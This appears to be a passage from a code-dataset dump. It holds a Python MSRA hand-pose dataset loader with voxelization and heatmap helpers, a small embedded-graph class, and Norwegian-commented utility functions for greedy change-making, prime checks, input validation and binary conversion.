x, y in zip(p_x, p_y):\n uv.append([x, y])\n return uv\n\n\ndef depthmap2points(image, fx, fy):\n h, w = image.shape\n x, y = np.meshgrid(np.arange(w) + 1, np.arange(h) + 1)\n points = np.zeros((h, w, 3), dtype=np.float32)\n points[:, :, 0], points[:, :, 1], points[:, :, 2] = pixel2world(x, y, image, w, h, fx, fy)\n return points\n\n\ndef points2pixels(points, img_width, img_height, fx, fy):\n pixels = np.zeros((points.shape[0], 2))\n pixels[:, 0], pixels[:, 1] = \\\n world2pixel(points[:, 0], points[:, 1], points[:, 2], img_width, img_height, fx, fy)\n return pixels\n\n\ndef get_rotational_value(rf, randomRot, uv, img_width, img_height):\n \"\"\"\n Re-orientated the hand such that it is always up-right\n :param rf:\n :param randomRot:\n :param uv:\n :param img_width:\n :param img_height:\n :return:\n \"\"\"\n # ((0, 17), []),\n # ((17, 1), []),\n # ((1, 5), []),\n # ((5, 9), []),\n # ((9, 13), []),\n # ((13, 0), []),\n wrist = np.array(uv[0])\n palms = np.array([uv[1], uv[5], uv[9], uv[13]]).T # the palm excluding thumb\n palms = np.sum(palms, axis=1) / palms.shape[-1]# find centroid point\n\n center = np.array([img_height/2, img_width/2])\n wrist_norm = wrist - center\n palms_norm = palms - center\n A = (wrist - center) - (palms-center) # vector of hand coordinate\n upside_down = wrist[0] - palms[0] < 0\n\n\n A_norm = A / np.linalg.norm(A)\n B_norm = np.array([0, 1])\n theta = np.arccos(np.clip(np.dot(A_norm, B_norm), -1.0, 1.0))\n absdegree = np.rad2deg(theta)\n\n def direction(start, center , end):\n c = (start[0] - center[0])*(end[1]-center[1]) - (start[1]-center[1])*(end[0]-center[0])\n if c < 0:\n c = -1\n elif c > 0:\n c = 1\n else:\n c = 0\n return -1 * c\n\n c = direction(wrist, center, [center[0], center[1] + 1])\n if c <= -1:\n degree = c * absdegree\n else:\n degree = absdegree\n # if wrist_norm[0] > palms_norm[0]:\n # c = direction(wrist, center, [center[0], center[1]+1])\n # else:\n # c = direction(palms, center, [center[0], center[1]+1])\n\n return 0\n\n\ndef load_depthmap(filename, img_width, img_height, max_depth, crop_dim, randomRot, uv):\n with open(filename, mode='rb') as f:\n data = f.read()\n _, _, left, top, right, bottom = struct.unpack('I' * 6, data[:6 * 4])\n num_pixel = (right - left) * (bottom - top)\n cropped_image = struct.unpack('f' * num_pixel, data[6 * 4:])\n cropped_image = np.asarray(cropped_image).reshape(bottom - top, -1)\n depth_image = np.zeros((img_height, img_width), dtype=np.float32)\n depth_image[top:bottom, left:right] = cropped_image\n\n center, scale = xywh2cs(left, top, right - left, bottom - top, crop_dim, crop_dim)\n rf = 25\n uv = np.array(uv)\n rotation = get_rotational_value(rf, 0.5, uv, img_width, img_height)\n\n # print(f\"rotation level: {rotation}\")\n trans = get_affine_transformation(center,\n scale,\n rot=rotation,\n output_size=(crop_dim, crop_dim))\n depth_image[depth_image == 0] = max_depth\n depth_image = cv2.warpAffine(depth_image, trans, (crop_dim, crop_dim))\n depth_image[depth_image == 0] = max_depth\n\n return depth_image, trans\n\n\ndef get_affine_transformation(center,\n scale,\n rot,\n output_size,\n shift=np.array([0, 0], dtype=np.float32),\n inv=0):\n if not isinstance(scale, np.ndarray) and not isinstance(scale, list):\n print(scale)\n scale = np.array([scale, scale])\n\n scale_tmp = scale * 200.0\n src_w = scale_tmp[0]\n dst_w = output_size[0]\n dst_h = output_size[1]\n\n rot_rad = np.pi * rot / 180\n src_dir = get_dir([0, src_w * -0.5], rot_rad)\n dst_dir = np.array([0, dst_w * -0.5], np.float32)\n\n src = np.zeros((3, 2), dtype=np.float32)\n dst = np.zeros((3, 2), dtype=np.float32)\n src[0, :] = center + scale_tmp * shift\n src[1, :] = center + src_dir + scale_tmp * shift\n dst[0, :] = [dst_w * 0.5, dst_h * 0.5]\n dst[1, :] = np.array([dst_w * 0.5, dst_h * 0.5]) + dst_dir\n\n src[2:, :] = get_3rd_point(src[0, :], src[1, :])\n dst[2:, :] = get_3rd_point(dst[0, :], dst[1, :])\n\n if inv:\n trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))\n else:\n trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))\n\n return trans\n\n\ndef get_3rd_point(a, b):\n direct = a - b\n return b + np.array([-direct[1], direct[0]], dtype=np.float32)\n\n\ndef get_dir(src_point, rot_rad):\n sn, cs = np.sin(rot_rad), np.cos(rot_rad)\n\n src_result = [0, 0]\n src_result[0] = src_point[0] * cs - src_point[1] * sn\n src_result[1] = src_point[0] * sn + src_point[1] * cs\n\n return src_result\n\n\ndef xywh2cs(x, y, w, h, img_width, img_height):\n center = np.zeros((2), dtype=np.float32)\n center[0] = x + w * 0.5\n center[1] = y + h * 0.5\n aspect_ratio = img_width * 1. / img_height\n pixel_std = 200\n if w > aspect_ratio * h:\n h = w * 1.0 / aspect_ratio\n elif w < aspect_ratio * h:\n w = h * aspect_ratio\n scale = np.array(\n [w * 1.0 / pixel_std, h * 1.0 / pixel_std],\n dtype=np.float32)\n if center[0] != -1:\n scale = scale * 1.25\n\n return center, scale\n\n\ndef discretize(coord, cropped_size):\n '''[-1, 1] -> [0, cropped_size]'''\n min_normalized = -1\n max_normalized = 1\n scale = (max_normalized - min_normalized) / cropped_size\n return (coord - min_normalized) / scale\n\n\ndef warp2continuous(coord, refpoint, cubic_size, cropped_size):\n '''\n Map coordinates in set [0, 1, .., cropped_size-1] to original range [-cubic_size/2+refpoint, cubic_size/2 + refpoint]\n '''\n min_normalized = -1\n max_normalized = 1\n\n scale = (max_normalized - min_normalized) / cropped_size\n coord = coord * scale + min_normalized # -> [-1, 1]\n\n coord = coord * cubic_size / 2 + refpoint\n\n return coord\n\n\ndef scattering(coord, cropped_size):\n # coord: [0, cropped_size]\n # Assign range[0, 1) -> 0, [1, 2) -> 1, .. [cropped_size-1, cropped_size) -> cropped_size-1\n # That is, around center 0.5 -> 0, around center 1.5 -> 1 .. around center cropped_size-0.5 -> cropped_size-1\n coord = coord.astype(np.int32)\n\n mask = (coord[:, 0] >= 0) & (coord[:, 0] < cropped_size) & \\\n (coord[:, 1] >= 0) & (coord[:, 1] < cropped_size) & \\\n (coord[:, 2] >= 0) & (coord[:, 2] < cropped_size)\n\n coord = coord[mask, :]\n\n cubic = np.zeros((cropped_size, cropped_size, cropped_size))\n\n # Note, directly map point coordinate (x, y, z) to index (i, j, k), instead of (k, j, i)\n # Need to be consistent with heatmap generating and coordinates extration from heatmap\n cubic[coord[:, 0], coord[:, 1], coord[:, 2]] = 1\n\n return cubic\n\n\ndef extract_coord_from_output(output, center=True):\n '''\n output: shape (batch, jointNum, volumeSize, volumeSize, volumeSize)\n center: if True, add 0.5, default is true\n return: shape (batch, jointNum, 3)\n '''\n assert (len(output.shape) >= 3)\n vsize = output.shape[-3:]\n\n output_rs = output.reshape(-1, np.prod(vsize))\n max_index = np.unravel_index(np.argmax(output_rs, axis=1), vsize)\n max_index = np.array(max_index).T\n\n xyz_output = max_index.reshape([*output.shape[:-3], 3])\n\n # Note discrete coord can represents real range [coord, coord+1), see function scattering()\n # So, move coord to range center for better fittness\n if center: xyz_output = xyz_output + 0.5\n\n return xyz_output\n\n\ndef generate_coord(points, refpoint, new_size, angle, trans, sizes):\n cubic_size, cropped_size, original_size = sizes\n\n # points shape: (n, 3)\n coord = points\n\n # note, will consider points within range [refpoint-cubic_size/2, refpoint+cubic_size/2] as candidates\n\n # normalize\n coord = (coord - refpoint) / (cubic_size / 2) # -> [-1, 1]\n # print(f\"refpoint: {refpoint}\")\n # print(f\"coord: {coord}\")\n\n # discretize\n coord = discretize(coord, cropped_size) # -> [0, cropped_size]\n coord += (original_size / 2 - cropped_size / 2) # move center to original volume\n # print(f\"coord norm: {coord}\")\n\n # resize around original volume center\n resize_scale = new_size / 100\n if new_size < 100:\n coord = coord * resize_scale + original_size / 2 * (1 - resize_scale)\n elif new_size > 100:\n coord = coord * resize_scale - original_size / 2 * (resize_scale - 1)\n else:\n # new_size = 100 if it is in test mode\n pass\n\n # rotation\n if angle != 0:\n original_coord = coord.copy()\n original_coord[:, 0] -= original_size / 2\n original_coord[:, 1] -= original_size / 2\n coord[:, 0] = original_coord[:, 0] * np.cos(angle) - original_coord[:, 1] * np.sin(angle)\n coord[:, 1] = original_coord[:, 0] * np.sin(angle) + original_coord[:, 1] * np.cos(angle)\n coord[:, 0] += original_size / 2\n coord[:, 1] += original_size / 2\n\n # translation\n # Note, if trans = (original_size/2 - cropped_size/2), the following translation will\n # cancel the above translation(after discretion). It will be set it when in test mode.\n coord -= trans\n\n return coord\n\n\ndef generate_cubic_input(points, refpoint, new_size, angle, trans, sizes):\n _, cropped_size, _ = sizes\n coord = generate_coord(points, refpoint, new_size, angle, trans, sizes)\n\n # scattering\n cubic = scattering(coord, cropped_size)\n\n return cubic\n\n\ndef generate_cubic_hand(keypoints, refpoint, new_size, angle, trans, sizes):\n _, cropped_size, _ = sizes\n coord = generate_coord(keypoints, refpoint, new_size, angle, trans, sizes)\n\n # scattering\n cubic = scattering(coord.copy(), cropped_size)\n\n # adding shape\n # centers = []\n # raddis = []\n for i, j in CONNECTIONS:\n j1, j2 = coord[i], coord[j]\n\n r_x = abs(j1[0] - j2[0])\n r_y = abs(j1[1] - j2[1])\n r_z = abs(j1[2] - j2[2])\n d = np.sqrt(r_x ** 2 + r_y ** 2 + r_z ** 2)\n\n rot = np.deg2rad([80, 30, 20])\n\n c_x = abs(j1[0] - j2[0]) / 2 + min(j1[0], j2[0])\n c_y = abs(j1[1] - j2[1]) / 2 + min(j1[1], j2[1])\n c_z = abs(j1[2] - j2[2]) / 2 + min(j1[2], j2[2])\n\n # centers.append((c_x, c_y, c_z))\n\n cubic += make_ellipsoid_image(cubic.shape, (c_x, c_y, c_z), [d / 2.5] * 3, rot)\n cubic = (cubic >= 1).astype(np.float32)\n return cubic\n\n\ndef generate_heatmap_gt(keypoints, refpoint, new_size, angle, trans, sizes, d3outputs, pool_factor, std):\n _, cropped_size, _ = sizes\n d3output_x, d3output_y, d3output_z = d3outputs\n\n coord = generate_coord(keypoints, refpoint, new_size, angle, trans, sizes) # [0, cropped_size]\n coord /= pool_factor # [0, cropped_size/pool_factor]\n\n # heatmap generation\n output_size = int(cropped_size / pool_factor)\n heatmap = np.zeros((keypoints.shape[0], output_size, output_size, output_size))\n\n # use center of cell\n center_offset = 0.5\n\n for i in range(coord.shape[0]):\n xi, yi, zi = coord[i]\n heatmap[i] = np.exp(-(np.power((d3output_x + center_offset - xi) / std, 2) / 2 + \\\n np.power((d3output_y + center_offset - yi) / std, 2) / 2 + \\\n np.power((d3output_z + center_offset - zi) / std, 2) / 2))\n\n return heatmap\n\n\ndef affine_transform(pt, t):\n new_pt = np.array([pt[0], pt[1], 1.]).T\n new_pt = np.dot(t, new_pt)\n return new_pt[:2]\n\n\ndef generate_jointsmap(uv_coord, depth, width, height, channel=3):\n canvas = np.zeros((height, width))\n bones = [\n ((17, 18), [130] * channel),\n ((18, 19), [140] * channel),\n ((19, 20), [150] * channel),\n\n ((1, 2), [10] * channel),\n ((2, 3), [20] * channel),\n ((3, 4), [30] * channel),\n\n ((5, 6), [40] * channel),\n ((6, 7), [50] * channel),\n ((7, 8), [60] * channel),\n\n ((9, 10), [70] * channel),\n ((10, 11), [80] * channel),\n ((11, 12), [90] * channel),\n\n ((13, 14), [100] * channel),\n ((14, 15), [110] * channel),\n ((15, 16), [120] * channel),\n\n ((0, 17), []),\n ((0, 1), []),\n ((0, 5), []),\n ((0, 9), []),\n ((0, 13), [])\n ]\n palm = []\n for connection, _ in [((0, 17), []),\n ((17, 1), []),\n ((1, 5), []),\n ((5, 9), []),\n ((9, 13), []),\n ((13, 0), []), ]:\n coord1 = uv_coord[connection[0]]\n palm.append([int(coord1[0]), int(coord1[1])])\n # palm.append([int((coord1[0]-.5)* W_scale+ W_offset ), int(-(coord1[1]- .5)* H_scale+ H_offset)])\n # print(palm)\n palm_colors = [depth[0], depth[17], depth[1], depth[5], depth[9], depth[13]]\n palm_colors = list(filter(lambda x: x >= 0, palm_colors))\n # if len(palm_colors) == 6:\n # binary_mask = np.zeros((height, width))\n # cv2.fillConvexPoly(binary_mask, np.array([palm], dtype=np.int32), 1)\n #\n # avg_color_upper = np.average(palm_colors[2::])\n # avg_color_lower = np.average(palm_colors[::2])\n #\n # Xs, Ys = np.array(palm).T\n # Xmax, Xmin = np.max(Xs), np.min(Xs)\n # Ymax, Ymin = np.max(Ys), np.min(Ys)\n #\n # orientation = None\n # s_c = None # start_color\n # d_c = None # end_color\n # wrist = np.array([palm[0], palm[1]]).T\n # if Xmax in wrist[0]:\n # orientation = \"leftRight\"\n # s_c = avg_color_upper\n # d_c = avg_color_lower\n # elif Xmin in wrist[0]:\n # orientation = \"RightLeft\"\n # s_c = avg_color_lower\n # d_c = avg_color_upper\n # elif Ymax in wrist[1]:\n # orientation = \"TopDown\"\n # s_c = avg_color_upper\n # d_c = avg_color_lower\n # else:\n # orientation = \"BottomUp\"\n # s_c = avg_color_lower\n # d_c = avg_color_upper\n #\n # n_step = Xmax - Xmin if 'left' in orientation.lower() else Ymax - Ymin\n #\n # gradient_offset = np.abs(avg_color_lower - avg_color_upper) / n_step\n #\n # def add(x, y):\n # return x+y\n # def minus(x,y):\n # return x-y\n #\n # color_operation = minus if s_c > d_c else add\n #\n # for i in range(int(n_step)):\n # s_c = color_operation(s_c, i * gradient_offset)\n # if 'left' in orientation.lower():\n # canvas[:, Xmin + i] = s_c\n # else:\n # canvas[Ymin +i, :] = s_c\n #\n # canvas = np.multiply(canvas, binary_mask)\n # else:\n if len(palm_colors):\n pass\n # cv2.fillPoly(canvas, np.array([palm], dtype=np.int32), np.average(palm_colors))\n\n\n\n for connection, color in bones:\n temp_canvas = np.zeros(canvas.shape)\n coord1 = uv_coord[connection[0]]\n coord2 = uv_coord[connection[1]]\n coords = np.stack([coord1, coord2])\n colors = [depth[connection[0]], depth[connection[1]]]\n if -1 in colors or len(colors) == 0:\n continue\n else:\n color = np.average(colors)\n # 0.5, 0.5 is the center\n x = coords[:, 0]\n y = coords[:, 1]\n mX = x.mean()\n mY = y.mean()\n length = ((x[0] - x[1]) ** 2 + (y[0] - y[1]) ** 2) ** 0.5\n angle = np.math.degrees(np.math.atan2(y[0] - y[1], x[0] - x[1]))\n radius = 2\n polygon = cv2.ellipse2Poly((int(mX), int(mY)), (int(length / 3), radius), int(angle), 0, 360, 1)\n cv2.fillConvexPoly(temp_canvas, polygon, color)\n canvas = np.maximum(canvas, temp_canvas)\n\n return canvas\n\n\ndef normalize(image, min_value, max_value):\n # image = cv2.normalize(image, None, alpha=1.0, norm_type=cv2.NORM_MINMAX)\n # inverted_image = np.abs(image - 1.0)\n image = (image - min_value) / (max_value - min_value)\n image[image < 0] = 0\n return image\n\n\ndef gaussian_kernel(height, width, x, y, sigma):\n gridy, gridx = np.mgrid[0:width, 0:height]\n D2 = (gridx - x) ** 2 + (gridy - y) ** 2\n return np.exp(-D2 / 2.0 / sigma / sigma)\n\n\ndef generate_heatmap(x, y, width, height, sigma, depth, max_depth=700):\n # centermap = np.zeros((height, width, 1), dtype=np.float32)\n center_map = gaussian_kernel(width, height, x, y, sigma)\n # print(center_map.shape)\n center_map[center_map > 1] = 1\n center_map[center_map < 0.0099] = 0\n center_map *= depth\n # centermap[:, :, 0] = center_map\n\n return center_map\n\n\nclass V2VVoxelization(object):\n def __init__(self, cubic_size, augmentation=True):\n self.cubic_size = cubic_size\n self.cropped_size, self.original_size = 64, 96\n self.sizes = (self.cubic_size, self.cropped_size, self.original_size)\n self.pool_factor = 2\n self.std = 1.7\n self.augmentation = augmentation\n\n output_size = int(self.cropped_size / self.pool_factor)\n # Note, range(size) and indexing = 'ij'\n self.d3outputs = np.meshgrid(np.arange(output_size), np.arange(output_size), np.arange(output_size),\n indexing='ij')\n\n def __call__(self, sample):\n points, keypoints, refpoint = sample['points'], sample['keypoints'], sample['refpoint']\n\n ## Augmentations\n # Resize\n new_size = np.random.rand() * 40 + 80\n\n # Rotation\n angle = np.random.rand() * 80 / 180 * np.pi - 40 / 180 * np.pi\n\n # Translation\n trans = np.random.rand(3) * (self.original_size - self.cropped_size)\n\n if not self.augmentation:\n new_size = 100\n angle = 0\n trans = self.original_size / 2 - self.cropped_size / 2\n\n input = generate_cubic_input(points, refpoint, new_size, angle, trans, self.sizes)\n keypointsVoxel = generate_cubic_hand(keypoints, refpoint, new_size, angle, trans, self.sizes)\n # keypointsVoxel = generate_cubic_input(keypoints, refpoint, new_size, angle, trans, self.sizes)\n\n keypoints = generate_coord(keypoints, refpoint, new_size, angle, trans, self.sizes)\n # heatmap = generate_heatmap_gt(keypoints, refpoint, new_size, angle, trans, self.sizes, self.d3outputs,\n # self.pool_factor, self.std)\n\n return input.reshape((1, *input.shape)), keypoints, keypointsVoxel.reshape(\n (1, *keypointsVoxel.shape)) # , heatmap\n\n def voxelize(self, points, refpoint):\n new_size, angle, trans = 100, 0, self.original_size / 2 - self.cropped_size / 2\n input = generate_cubic_input(points, refpoint, new_size, angle, trans, self.sizes)\n return input.reshape((1, *input.shape))\n\n def generate_heatmap(self, keypoints, refpoint):\n new_size, angle, trans = 100, 0, self.original_size / 2 - self.cropped_size / 2\n heatmap = generate_heatmap_gt(keypoints, refpoint, new_size, angle, trans, self.sizes, self.d3outputs,\n self.pool_factor, self.std)\n return heatmap\n\n def evaluate(self, heatmaps, refpoints):\n coords = extract_coord_from_output(heatmaps)\n coords *= self.pool_factor\n keypoints = warp2continuous(coords, refpoints, self.cubic_size, self.cropped_size)\n return keypoints\n\n\nclass MSRAHandDataset(BaseDataset):\n\n @staticmethod\n def modify_commandline_options(parser, is_train):\n parser.add_argument(\"--num_keypoints\", type=int, default=21)\n parser.add_argument('--centerdir', type=str, default=f\"datasets/msra_center\")\n return parser\n\n def __init__(self, opt):\n super(MSRAHandDataset, self).__init__(opt)\n self.img_width = 320\n self.img_height = 240\n self.min_depth = 100\n self.max_depth = 700\n self.fx = 241.42\n self.fy = 241.42\n self.joint_num = 21\n self.world_dim = 3\n self.folder_list = ['1', '2', '3', '4', '5', '6', '7', '8', '9',\n 'I', 'IP', 'L', 'MP', 'RP', 'T', 'TIP', 'Y']\n self.subject_num = 9\n\n self.root = opt.dataroot\n self.center_dir = f\"../datasets/legacy_datasets/msra_hand/center\"\n self.test_subject_id = 3\n self.mode = 'train' if opt.isTrain else 'test'\n self.transform = V2VVoxelization(200, True)\n\n self.updatable_rot = 0.6\n self.step_rot = 0.05\n\n if not self.mode in ['train', 'test']: raise ValueError('Invalid mode')\n assert self.test_subject_id >= 0 and self.test_subject_id < self.subject_num\n\n if not self._check_exists(): raise RuntimeError('Invalid MSRA hand dataset')\n\n self._load()\n\n def __getitem__(self, index):\n crop_dim = 256\n xyz = self.joints_world[index]\n z = xyz[:, -1]\n uv = world2pixel(xyz[:, 0], xyz[:, 1], xyz[:, 2], self.img_width, self.img_height, self.fx, self.fy)\n\n depthmap, trans = load_depthmap(self.names[index], self.img_width, self.img_height, self.max_depth, crop_dim, self.updatable_rot, uv)\n # points = depthmap2points(depthmap, self.fx, self.fy)\n # points = points.reshape((-1, 3))\n\n for i, pair in enumerate(uv):\n uv[i] = affine_transform(pair, trans)\n\n # depth inversion\n depthmap = np.ones(depthmap.shape) * 700.0 - depthmap\n z = np.ones(z.shape) * 700 - z\n max_value = 700\n min_value = 0\n\n heatmaps_image = np.zeros((crop_dim, crop_dim))\n heatmaps = []\n ordermap = np.zeros((crop_dim, crop_dim))\n z_norms = []\n for i, (x, y) in enumerate(uv):\n if x >= crop_dim or y >= crop_dim or x < 0 or y < 0:\n z_norms.append(-1)\n heatmaps.append(np.zeros(depthmap.shape))\n continue\n z_value = depthmap[int(y), int(x)] if depthmap[int(y), int(x)] > 0 else z[i]\n z_norm = (z_value - min_value) / (max_value - min_value)\n z_norms.append(z_norm)\n\n gaussian_map = generate_heatmap(x, y, crop_dim, crop_dim, 2.5, 1)\n\n heatmaps.append(gaussian_map)\n heatmaps_image = np.maximum(gaussian_map * z_norm, heatmaps_image)\n\n jointsmap = np.squeeze(generate_jointsmap(uv, z_norms, crop_dim, crop_dim, 1))\n heatmaps_image = np.maximum(heatmaps_image, jointsmap)\n\n heatmaps = np.stack(heatmaps)\n z_norms = [[i] for i in z_norms]\n sample = {\n # 'name': self.names[index],\n 'depthmap': normalize(depthmap, min_value, max_value),\n 'heatmaps': heatmaps_image,\n 'gaussian_pts': heatmaps,\n 'refpoint': self.ref_pts[index],\n 'fx': self.fx,\n 'fy': self.fy,\n 'trans': trans,\n 'xyz': xyz,\n 'uv': uv,\n 'z': z_norms\n }\n\n sample = self._transform(sample)\n\n return sample\n\n def __len__(self):\n return self.num_samples\n\n def _load(self):\n self._compute_dataset_size()\n\n self.num_samples = self.train_size if self.mode == 'train' else self.test_size\n self.joints_world = np.zeros((self.num_samples, self.joint_num, self.world_dim))\n self.ref_pts = np.zeros((self.num_samples, self.world_dim))\n self.names = []\n\n # Collect reference center points strings\n if self.mode == 'train':\n ref_pt_file = 'center_train_' + str(self.test_subject_id) + '_refined.txt'\n else:\n ref_pt_file = 'center_test_' + str(self.test_subject_id) + '_refined.txt'\n\n with open(os.path.join(self.center_dir, ref_pt_file)) as f:\n ref_pt_str = [l.rstrip() for l in f]\n\n #\n file_id = 0\n frame_id = 0\n\n for mid in range(self.subject_num):\n if self.mode == 'train':\n model_chk = (mid != self.test_subject_id)\n elif self.mode == 'test':\n model_chk = (mid == self.test_subject_id)\n else:\n raise RuntimeError('unsupported mode {}'.format(self.mode))\n\n if model_chk:\n for fd in self.folder_list:\n annot_file = os.path.join(self.root, 'P' + str(mid), fd, 'joint.txt')\n\n lines = []\n with open(annot_file) as f:\n lines = [line.rstrip() for line in f]\n\n # skip first line\n for i in range(1, len(lines)):\n # referece point\n splitted = ref_pt_str[file_id].split()\n if splitted[0] == 'invalid':\n print('Warning: found invalid reference frame')\n file_id += 1\n continue\n else:\n self.ref_pts[frame_id, 0] = float(splitted[0])\n self.ref_pts[frame_id, 1] = float(splitted[1])\n self.ref_pts[frame_id, 2] = float(splitted[2])\n\n # joint point\n splitted = lines[i].split()\n for jid in range(self.joint_num):\n self.joints_world[frame_id, jid, 0] = float(splitted[jid * self.world_dim])\n self.joints_world[frame_id, jid, 1] = float(splitted[jid * self.world_dim + 1])\n self.joints_world[frame_id, jid, 2] = -float(splitted[jid * self.world_dim + 2])\n\n filename = os.path.join(self.root, 'P' + str(mid), fd, '{:0>6d}'.format(i - 1) + '_depth.bin')\n self.names.append(filename)\n\n frame_id += 1\n file_id += 1\n\n def _compute_dataset_size(self):\n self.train_size, self.test_size = 0, 0\n\n for mid in range(self.subject_num):\n num = 0\n for fd in self.folder_list:\n annot_file = os.path.join(self.root, 'P' + str(mid), fd, 'joint.txt')\n with open(annot_file) as f:\n num = int(f.readline().rstrip())\n if mid == self.test_subject_id:\n self.test_size += num\n else:\n self.train_size += num\n\n def _check_exists(self):\n # Check basic data\n for mid in range(self.subject_num):\n for fd in self.folder_list:\n\n annot_file = os.path.join(self.root, 'P' + str(mid), fd, 'joint.txt')\n # print(f\"fd: {fd}\")\n # print(f\"annofile: {annot_file}\")\n if not os.path.exists(annot_file):\n print('Error: annotation file {} does not exist'.format(annot_file))\n return False\n\n # Check precomputed centers by v2v-hand model's author\n for subject_id in range(self.subject_num):\n center_train = os.path.join(self.center_dir, 'center_train_' + str(subject_id) + '_refined.txt')\n center_test = os.path.join(self.center_dir, 'center_test_' + str(subject_id) + '_refined.txt')\n if not os.path.exists(center_train) or not os.path.exists(center_test):\n print('Error: precomputed center files do not exist')\n return False\n\n return True\n\n def _transform(self, sample):\n for k, v in sample.items():\n sample[k] = torch.tensor(v, dtype=torch.float32)\n if k in ['depthmap', 'heatmaps']:\n sample[k] = torch.unsqueeze(sample[k], dim=0)\n return sample\n","sub_path":"nearest_neighbor_search/data/msrahand_dataset.py","file_name":"msrahand_dataset.py","file_ext":"py","file_size_in_byte":31570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"430289262","text":"#!/usr/bin/python\n\nfrom graph import *\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\nEMBEDDING_TOLERANCE = 1e-2 # values differing by tolerance are equal\n\nclass EmbeddedGraph(Graph):\n def __init__(self):\n Graph.__init__(self)\n self.x = []\n self.y = []\n\n def plot(self):\n plt.plot(self.x,self.y,'bo')\n for edge in self.e:\n xe = [self.x[edge[0]],self.x[edge[1]]]\n ye = [self.y[edge[0]],self.y[edge[1]]]\n plt.plot(xe,ye,\"r-\")\n\n def nearest_node(self,x,y):\n i_min = 0\n ds_min = 1e20\n for i in range(self.n):\n x1 = self.x[i]\n y1 = self.y[i]\n dx = x1-x\n dy = y1-y\n ds = np.sqrt(dx*dx + dy*dy)\n\n if(ds < ds_min):\n ds_min = ds\n i_min = i\n\n return (i_min, ds_min)\n\n\n def add_node(self,x,y):\n [i,ds] = self.nearest_node(x,y)\n if(ds < EMBEDDING_TOLERANCE):\n return\n\n self.v.append(self.n)\n self.n += 1\n self.x.append(x)\n self.y.append(y)\n \n def add_edge(self,i,j):\n if(not [i,j] in self.e and not [j,i] in self.e):\n self.e.append([i,j])\n\n\ndef get_connected_embedded_subgraphs(g0):\n subgraphs = get_connected_subgraphs(g0)\n\n embedded_subgraphs = []\n\n for subg in subgraphs:\n embsubg = EmbeddedGraph()\n\n embsubg.n = subg.n\n embsubg.v = list(range(subg.n))\n for edge in subg.e:\n i = subg.v.index(edge[0])\n j = subg.v.index(edge[1])\n embsubg.add_edge(i,j)\n for i in range(subg.n):\n embsubg.x.append(g0.x[subg.v[i]])\n embsubg.y.append(g0.y[subg.v[i]])\n\n embedded_subgraphs.append(embsubg)\n\n return embedded_subgraphs\n\n\n","sub_path":"embeddedgraph.py","file_name":"embeddedgraph.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388169911","text":"import math\n#Denne funksjonen tar inn et tall, og en liste med tall som brukes som\n#denominatorer. eksempel på funksjonskall: GraadigeAlgoritmen(200, [25, 10, 5, 1]\ndef GraadigeAlgoritmen(number, denominatorList):\n split = denominatorList\n res = []\n rest = number\n for x in range(len(split)):\n res.append(0)\n current = 0\n toomuch = False\n count = 1\n for x in range(len(split)):\n count = 1\n toomuch = False\n while not toomuch:\n current = count * split[x]\n if(current > rest):\n toomuch = True\n rest = rest - ((count -1)*split[x])\n else:\n res[x] = count\n count +=1\n return res\n\n#Denne funksjonen tar inn et tall, og returnerer True eller False avhengig om \n# det er et primtall eller ikke. Den fungerer, men er ikke veldig elegant, og\n#tar lang tid på større tall. Skal endre den til at den sjekker opp mot\n#roten av tallet, og ikke alle tall opp til tallet\ndef IsPrime(tall):\n prime = True\n for x in range(2, tall):\n if(tall%x==0):\n prime = False\n return prime\n\n#Dette er en slags utvidet input funksjon. Det kjekke med denne funksjonen er\n#at den vil spørre på nytt hvis inputen fra brukeren ikke tilfredstiller\n#kravene. Du slipper altså å ende opp med en programstoppende valueerror,\n#fordi inputen fra en bruker fører til at du prøver å legge sammen\n# 3e4a + ^*:\n#Eksempel: InputCheck('int', 'Skriv inn et heltall', 'Du skrev IKKE inn et\n# heltall, prøv igjen')\ndef InputCheck(dataType, prompt, errorMsg):\n a = 0\n while True:\n if(dataType == 'int'):\n try:\n a = int(input(prompt))\n break\n except ValueError:\n print(errorMsg)\n elif(dataType == 'string'):\n try:\n a = str(input(prompt))\n break\n except ValueError:\n print(errorMsg)\n elif(dataType == 'float'):\n try:\n a = float(input(prompt))\n break\n except ValueError:\n print(errorMsg)\n elif(dataType == 'bin'):\n a = input(prompt)\n a = str(a)\n invalChar = False\n for x in range(len(a)):\n if(a[x] != '0' and a[x] != '1'):\n invalChar = True\n break\n if(invalChar == False):\n break\n else:\n print(errorMsg)\n return a\n\n#Denne algoritmen tar inn et tall i titallssystemet, og gjør det til et\n#binært tall(totalssystemet)\ndef ToBin(tall):\n less = True\n i = 0\n rest = tall\n product = ''\n while less:\n if(math.pow(2,i) > tall):\n less = False\n i = i-1\n break\n i+=1\n for x in range(i,-1,-1):\n if(math.pow(2,i) <= rest):\n product += '1'\n rest = rest - math.pow(2,i)\n else:\n product += '0'\n i-=1\n return product\n \n#Denne funskjonen tar inn et binært tall, og gjør det om til et tall i\n#titallssystemet\ndef FromBin(tall):\n tall = str(tall)\n tiTall = 0\n for x in range(len(tall)):\n if(int(tall[x])==1):\n tiTall += int(math.pow(2,(len(tall)-1)-x))\n return tiTall\n\n#De neste funksjonene har ikke veldig stor praktisk betydning.\n#De tar seg av ting som å konvertere strenger til lister med\n#ascii-verdien av tegnene i strengen, og gjøre om de verdiene til\n#binære tall. Noen av de tar seg av formattering av de binære tallene\ndef StringToChar(string):\n chars = []\n for x in range(len(string)):\n chars.append(ord(string[x]))\n return chars\n\ndef CharToBin(charList):\n bins = []\n for x in range(len(charList)):\n bins.append(ToBin(charList[x]))\n return bins\n\ndef RevKonkat(string, extras):\n zeros = ''\n string = str(string)\n for x in range(extras):\n zeros += '0'\n result = zeros + string\n return result\ndef GetLargestLenght(strList):\n if(len(strList)>=1): \n maxLen = len(strList[0])\n else:\n maxLen = 0\n for x in range(1, len(strList)):\n if(len(strList[x]) > (len(strList[x-1]))):\n maxLen = len(strList[x])\n return maxLen\n\n\ndef MakeEvenList(strList):\n maxLen = GetLargestLenght(strList)\n for x in range(len(strList)):\n strList[x] = RevKonkat(strList[x], (maxLen - len(strList[x])))\n return strList\n#Denne funkjsonen knytter alle funskjonene ovenfor sammen. Den tar\n#inn en streng, og vil returnere en streng som er en 